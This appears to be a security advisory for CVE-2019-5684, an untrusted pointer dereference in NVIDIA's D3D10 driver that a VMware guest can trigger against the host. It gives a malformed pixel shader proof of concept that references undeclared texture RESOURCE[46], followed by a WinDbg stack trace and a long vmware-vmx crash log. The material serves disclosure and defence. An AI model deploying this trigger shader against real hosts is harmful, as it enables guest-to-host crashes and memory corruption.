CVE‑2019‑5684
An exploitable untrusted pointer dereference vulnerability exists in NVIDIA NVWGF2UMX_CFG driver, versions 24.21.14.1216 and 412.16. A specially crafted pixel shader can cause an untrusted pointer dereference, potentially resulting in code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, and will affect a VMware host.
NVWGF2UMX_CFG.DLL (version 24.21.14.1216) NVIDIA D3D10 Driver, version 412.16 on NVIDIA Quadro K620 VMware Workstation 15 (15.0.2 build-10952284) with Windows 10 x64 as guestVM
9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-822: Untrusted Pointer Dereference
This vulnerability can be triggered by supplying a malformed pixel shader (inside VMware guest OS). This attack can be triggered from VMware guest usermode to cause untrusted pointer dereference (potential memory corruption) on the vmware-vmx.exe
process on the host or, theoretically, through WEBGL (remote website).
Example of malformed pixel shader:
(vmware debug mode):
ps_4_1
DCL_INPUT_PS INPUT[1].xy, LINEAR
DCL_OUTPUT OUTPUT[0].xy
DCL_TEMPS 3
DCL_RESOURCE RESOURCE[5], TEXTURE2DARRAY, {FLOAT, FLOAT, FLOAT, FLOAT}
DCL_SAMPLER SAMPLER[5], DEFAULT
MOV TEMP[0].xy, INPUT[1].xyxx
MOV TEMP[0].z, {0, 0, 0, 0}
SAMPLE_AOFFIMMI(-1, 0, 0) TEMP[1].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
SAMPLE TEMP[2].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
SAMPLE_AOFFIMMI(1, 0, 0) TEMP[0].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
ADD TEMP[0].zw, TEMP[1].xxxy, TEMP[2].xxxy
ADD TEMP[0].xy, TEMP[0].xyxx, TEMP[0].zwzz
MUL OUTPUT[0].xy, TEMP[0].xyxx, {0.333333343, 0.333333343, 0, 0}
RET
The DCL_RESOURCE
instruction declares a non-multisampled shader-input resource, where the first operand is the texture register, where N is an integer that denotes the register number.
By modifying the shader instructions (shader bytecode), especially the operand (texture register) of SAMPLE
instructions from previously declared RESOURCE[5]
to a different RESOURCE[X]
(in this case X=46), it is possible to trigger an arbitrary memory write (untrusted pointer dereference).
(VMware release mode crash dump fragment):
0:015> .ecxr
rax=0000021100000000 rbx=000002110bc25568 rcx=0000000000000000
rdx=00000000ffffffff rsi=00007ffb42380074 rdi=000002110bc38c80
rip=00007ffb41344e80 rsp=00000046008fa610 rbp=0000000000000068
r8=0000000000000000 r9=000002110bc25568 r10=00007ffb4110a2c0
r11=000002110bc371d0 r12=00000210f9f1ac60 r13=00000210f9f1b1e0
r14=000002110bc25568 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
nvwgf2umx_cfg!OpenAdapter12+0x677290:
00007ffb`41344e80 89486c mov dword ptr [rax+6Ch],ecx ds:00000211`0000006c=????????
Stack trace:
0:015> kb
*** Stack trace for last set context - .thread/.cxr resets it
# RetAddr : Args to Child : Call Site
00 00007ffb`410af212 : 00007ffb`41225940 00007ffb`41225940 00007ffb`4238005c 00000211`0bc38cb0 : nvwgf2umx_cfg!OpenAdapter12+0x677290
01 00007ffb`410af2af : 00000211`0bc1a428 00000046`008fb7c0 00000211`0bc1a428 00000211`0bc25568 : nvwgf2umx_cfg!OpenAdapter12+0x3e1622
02 00007ffb`4104f9d2 : 00000211`0bc25568 00000046`008fb7c0 00000211`0bc1a428 00000046`008fb7b8 : nvwgf2umx_cfg!OpenAdapter12+0x3e16bf
03 00007ffb`40faa8f6 : 00000210`fa216140 00000000`00000001 0000020f`70677478 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x381de2
04 00007ffb`40ed7414 : 00000000`00000001 00000000`00000001 00000210`fa4b1440 00000210`fa4b1070 : nvwgf2umx_cfg!OpenAdapter12+0x2dcd06
05 00007ffb`40edda72 : 00000000`00000000 00000210`fa4b1440 00000000`00000000 a4c7a90a`b7ff407f : nvwgf2umx_cfg!OpenAdapter12+0x209824
06 00007ffb`41a7fd4b : 00000210`fa4b1070 00000000`00000000 00000210`fa4b1440 00000210`f9952f40 : nvwgf2umx_cfg!OpenAdapter12+0x20fe82
07 00007ffb`41a1813a : 00000000`80004005 0000020f`70677460 00000000`80004005 00000210`f9952f40 : nvwgf2umx_cfg!NVAPI_Thunk+0x4019bb
08 00007ffb`40ed4509 : 00000000`00000030 00007ffb`41a17fc0 00000210`fa3d19c0 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x399daa
09 00007ffb`40ce206b : 00000000`00000000 00000046`008fbcd1 00007ffb`4192e190 00000046`008f0000 : nvwgf2umx_cfg!OpenAdapter12+0x206919
0a 00007ffb`40ed562e : 00000210`fa23ae60 00000210`fa23ae80 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x1447b
0b 00007ffb`41a9fc11 : 00000000`00000000 00000210`fa1fd988 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x207a3e
0c 00007ffb`41a9a1b7 : 00000000`00000000 00000000`00000000 00000210`f9952f40 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x421881
0d 00007ffb`48eeb11d : 00000000`00000000 00000210`fa1fd978 00000210`f9949050 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x41be27
0e 00007ffb`48ee4eab : 00000211`0bc0df58 00000210`f9949050 00000210`fa1fd978 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219
0f 00007ffb`48ee4dc3 : 00000046`008fe170 00007ffb`490c3b10 00000210`fa1fd820 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
10 00007ffb`48ef7665 : 00000210`fa1fd870 00000046`008fe170 00000046`008fe1a0 00007ffb`490c3b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b
11 00007ffb`48efcac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975
12 00007ffb`48efd3c0 : 00000210`fa1fd820 00000211`0bbeb4e8 00007ffb`490c30e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266
13 00007ffb`48edca83 : 00000210`f99ec980 00000210`00000009 00000210`f99ed1b8 00007ffb`48edaa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
14 00007ffb`48eda976 : 00000211`0bc0dec0 00000000`0000b000 00000046`008fe599 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f
15 00007ffb`48eda768 : 00000210`f99ed1b8 00000211`0bc0dec0 00000000`000001e8 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202
16 00007ff7`6ac48522 : 00000210`fa5bd090 00007ff7`6a990000 00007ff7`6a990000 0000020f`72000600 : d3d11!CDevice::CreatePixelShader+0x28
17 00007ff7`6ac49e05 : 00000210`fa5bd090 00007ff7`6a990000 00007ff7`6a990000 00000046`008fe630 : vmware_vmx+0x2b8522
18 00007ff7`6ac48c82 : 00000210`fa5c5010 00007ff7`6a990000 00000210`fa5bd090 00000210`fa5bd090 : vmware_vmx+0x2b9e05
19 00007ff7`6ac45171 : 00000000`fffff700 00000210`fa5bd090 00000000`00000004 00000210`fa1f5fa0 : vmware_vmx+0x2b8c82
1a 00007ff7`6ab9ee09 : 00007ff7`6ab9ed40 00000210`fa1f5f90 00000000`000044e8 00007ff7`6ac83960 : vmware_vmx+0x2b5171
1b 00007ff7`6ab32bc2 : 00000000`00000000 00007ff7`6ab9ed40 00000046`008ff840 00000000`000044e8 : vmware_vmx+0x20ee09
1c 00007ff7`6ab30c6f : 00000046`008ff960 00000000`00000000 00000000`00000000 00000000`00000002 : vmware_vmx+0x1a2bc2
1d 00007ff7`6aa86830 : 0000020f`720006e0 0000020f`720006e0 00000000`00000000 00000000`00000008 : vmware_vmx+0x1a0c6f
1e 00007ff7`6afab6d0 : 00007ff7`6aa86710 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf6830
1f 00007ffb`4cdd7e94 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61b6d0
20 00007ffb`4fbfa251 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
21 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
From vmware-vmx.exe (this is not a windbg crash dump):
2019-02-05T15:24:22.615+01:00| svga| W115: ----Win32 exception detected, exceptionCode 0xc0000005 (access violation)----
2019-02-05T15:24:22.615+01:00| svga| W115: ExceptionAddress 0x7ffb41344e80 eflags 0x00010206
2019-02-05T15:24:22.615+01:00| svga| W115: rwFlags 0x1 badAddr 0x2110000006c
2019-02-05T15:24:22.615+01:00| svga| W115: rax 0x21100000000 rbx 0x2110bc25568 rcx 0
2019-02-05T15:24:22.615+01:00| svga| W115: rdx 0x21100000000 rsi 0x7ffb42380074 rdi 0x2110bc38c80
2019-02-05T15:24:22.615+01:00| svga| W115: r8 0 r9 0x2110bc25568 r10 0x7ffb4110a2c0
2019-02-05T15:24:22.615+01:00| svga| W115: r11 0x2110bc371d0 r12 0x210f9f1ac60 r13 0x210f9f1b1e0
2019-02-05T15:24:22.615+01:00| svga| W115: r14 0x2110bc25568 r15 0
2019-02-05T15:24:22.615+01:00| svga| W115: rip 0x7ffb41344e80 rsp 0x46008fa610 rbp 0x68
2019-02-05T15:24:22.615+01:00| svga| W115: LastBranchToRip 0 LastBranchFromRip 0
2019-02-05T15:24:22.615+01:00| svga| W115: LastExceptionToRip 0 LastExceptionFromRip 0
2019-02-05T15:24:22.615+01:00| svga| W115: The following data was delivered with the exception:
2019-02-05T15:24:22.615+01:00| svga| W115: -- 0x1
2019-02-05T15:24:22.615+01:00| svga| W115: -- 0x2110000006c
2019-02-05T15:24:22.616+01:00| svga| I125: CoreDump: Minidump file K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp exists. Rotating ...
2019-02-05T15:24:22.618+01:00| svga| W115: CoreDump: Writing minidump to K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp
2019-02-05T15:24:22.632+01:00| mks| W115: Panic in progress... ungrabbing
2019-02-05T15:24:22.632+01:00| mks| I125: MKS: Release starting (Panic)
2019-02-05T15:24:22.632+01:00| mks| I125: MKS: Release finished (Panic)
2019-02-05T15:24:22.744+01:00| svga| I125: CoreDump: including module base 0x0x7ff76a990000 size 0x0x0124d000
2019-02-05T15:24:22.744+01:00| svga| I125: checksum 0x00f62ec3 timestamp 0x5ba2301c
2019-02-05T15:24:22.744+01:00| svga| I125: image file K:\tools\vmware\x64\vmware-vmx.exe
2019-02-05T15:24:22.744+01:00| svga| I125: file version 15.0.0.38213
2019-02-05T15:24:22.744+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4fb90000 size 0x0x001ed000
2019-02-05T15:24:22.744+01:00| svga| I125: checksum 0x001f20d1 timestamp 0xe8b54827
2019-02-05T15:24:22.744+01:00| svga| I125: image file C:\Windows\System32\ntdll.dll
2019-02-05T15:24:22.744+01:00| svga| I125: file version 10.0.17763.194
2019-02-05T15:24:22.744+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4cdc0000 size 0x0x000b3000
2019-02-05T15:24:22.744+01:00| svga| I125: checksum 0x000b9393 timestamp 0x65614da1
2019-02-05T15:24:22.744+01:00| svga| I125: image file C:\Windows\System32\kernel32.dll
2019-02-05T15:24:22.744+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.744+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4ca40000 size 0x0x00293000
2019-02-05T15:24:22.744+01:00| svga| I125: checksum 0x002a2815 timestamp 0x1659a33b
2019-02-05T15:24:22.744+01:00| svga| I125: image file C:\Windows\System32\KERNELBASE.dll
2019-02-05T15:24:22.744+01:00| svga| I125: file version 10.0.17763.134
2019-02-05T15:24:22.744+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bc90000 size 0x0x000fc000
2019-02-05T15:24:22.744+01:00| svga| I125: checksum 0x0010222e timestamp 0x309241e0
2019-02-05T15:24:22.744+01:00| svga| I125: image file C:\Windows\System32\ucrtbase.dll
2019-02-05T15:24:22.744+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.744+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f860000 size 0x0x00197000
2019-02-05T15:24:22.744+01:00| svga| I125: checksum 0x0019e334 timestamp 0x5960d576
2019-02-05T15:24:22.744+01:00| svga| I125: image file C:\Windows\System32\user32.dll
2019-02-05T15:24:22.744+01:00| svga| I125: file version 10.0.17763.168
2019-02-05T15:24:22.744+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4be90000 size 0x0x00020000
2019-02-05T15:24:22.744+01:00| svga| I125: checksum 0x000230fc timestamp 0xff141dbb
2019-02-05T15:24:22.744+01:00| svga| I125: image file C:\Windows\System32\win32u.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb3c200000 size 0x0x00015000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x00017b21 timestamp 0x5be33079
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\VCRUNTIME140.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 14.16.27024.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4d410000 size 0x0x00029000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x000274e8 timestamp 0xaa866dfc
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\gdi32.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4beb0000 size 0x0x0019a000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x001a04b3 timestamp 0x3513b275
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\gdi32full.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.194
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4c050000 size 0x0x000a0000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x000aa062 timestamp 0x64bc25b9
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\msvcp_win.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4fa00000 size 0x0x00155000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x001617b3 timestamp 0x47d4d9b6
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\ole32.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.134
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4d440000 size 0x0x0032d000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x0033012c timestamp 0x027b41b1
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\combase.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.253
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f2e0000 size 0x0x00122000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x0012b25f timestamp 0x38cc3507
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\rpcrt4.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.194
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4cd40000 size 0x0x0007e000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x000897e0 timestamp 0xe29631ca
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\bcryptPrimitives.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4d360000 size 0x0x000a3000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x000a4051 timestamp 0xb12069f9
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\advapi32.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f550000 size 0x0x0009e000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x000a6576 timestamp 0x05c26c69
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\msvcrt.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 7.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4d7f0000 size 0x0x0009e000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x000a9176 timestamp 0x7d59184a
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\sechost.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4da40000 size 0x0x014ef000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x0151e360 timestamp 0xcaf2f2df
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\shell32.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.168
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bd90000 size 0x0x0004a000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x0004f3eb timestamp 0xca7e64ca
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\cfgmgr32.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f7a0000 size 0x0x000a8000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x000a6bc1 timestamp 0x9a0e77eb
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\SHCore.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4c110000 size 0x0x0074a000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x0075dd54 timestamp 0x275f01a7
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\windows.storage.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.168
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bc10000 size 0x0x00024000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x0002ec08 timestamp 0x36191177
2019-02-05T15:24:22.745+01:00| svga| I125: image file C:\Windows\System32\profapi.dll
2019-02-05T15:24:22.745+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.745+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bbb0000 size 0x0x0005d000
2019-02-05T15:24:22.745+01:00| svga| I125: checksum 0x0006167d timestamp 0x8941f3e3
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\powrprof.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4d770000 size 0x0x00052000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0005be0c timestamp 0x4392c932
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\shlwapi.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bb90000 size 0x0x00011000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0001c039 timestamp 0xbe88784d
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\kernel.appcore.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4c0f0000 size 0x0x00017000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0001f088 timestamp 0xfe800ac7
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\cryptsp.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4cee0000 size 0x0x00475000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0048004f timestamp 0x8cfdc7f2
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\setupapi.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bc60000 size 0x0x00026000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0002f670 timestamp 0x4d019572
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\bcrypt.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f410000 size 0x0x0006d000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0006d338 timestamp 0x4ee4fbbf
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\ws2_32.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f480000 size 0x0x000cb000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x000d5ce4 timestamp 0xd0922571
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\oleaut32.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4c860000 size 0x0x001db000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x001de80e timestamp 0xb2fbbe58
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\crypt32.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb30790000 size 0x0x00096000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0009cb61 timestamp 0xd6d52567
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\dsound.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4bc40000 size 0x0x00012000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x0001b8e7 timestamp 0xac91a4b2
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\msasn1.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb49ad0000 size 0x0x00024000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x00029b8b timestamp 0x01dd0441
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\winmm.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb47800000 size 0x0x000f1000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x000f51d4 timestamp 0xa550ecc2
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\winhttp.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb488c0000 size 0x0x00013000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x000141f8 timestamp 0x645d63a8
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\wtsapi32.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb44da0000 size 0x0x00041000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x00040f64 timestamp 0xc2c19daa
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\WinSCard.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb49aa0000 size 0x0x0002d000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x000313bc timestamp 0x61c36296
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\WINMMBASE.dll
2019-02-05T15:24:22.746+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.746+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4b9a0000 size 0x0x00029000
2019-02-05T15:24:22.746+01:00| svga| I125: checksum 0x00035933 timestamp 0x38fddd55
2019-02-05T15:24:22.746+01:00| svga| I125: image file C:\Windows\System32\devobj.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x63620000 size 0x0x0001a000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x0001a664 timestamp 0x5b281fdf
2019-02-05T15:24:22.747+01:00| svga| I125: image file K:\tools\vmware\x64\zlib1.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 1.2.11.0
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4f0b0000 size 0x0x0002e000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x000306da timestamp 0x6b207046
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\imm32.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4a1e0000 size 0x0x0009c000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x00098b0d timestamp 0x4b037c22
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\uxtheme.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4ac60000 size 0x0x00031000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x000360d6 timestamp 0x376a9861
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\ntmarta.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x61de0000 size 0x0x0024c000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x00251aab timestamp 0x5b766433
2019-02-05T15:24:22.747+01:00| svga| I125: image file K:\tools\vmware\x64\libeay32.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 1.0.2.16
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb403d0000 size 0x0x0005d000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x00065472 timestamp 0x5b76643e
2019-02-05T15:24:22.747+01:00| svga| I125: image file K:\tools\vmware\x64\ssleay32.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 1.0.2.16
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4af80000 size 0x0x00033000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x00039b84 timestamp 0xeb037b86
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\rsaenh.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4b590000 size 0x0x0000c000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x0000d582 timestamp 0x210d2d73
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\CRYPTBASE.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4ba90000 size 0x0x0002f000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x000339df timestamp 0xebd3b7f6
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\sspicli.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4b3c0000 size 0x0x00067000
2019-02-05T15:24:22.747+01:00| svga| I125: checksum 0x0006cb14 timestamp 0x714e4053
2019-02-05T15:24:22.747+01:00| svga| I125: image file C:\Windows\System32\mswsock.dll
2019-02-05T15:24:22.747+01:00| svga| I125: file version 10.0.17763.1
2019-02-05T15:24:22.747+01:00| svga| I125: CoreDump: including module base 0x0x7ffb4b160000 size 0x0x000c6000
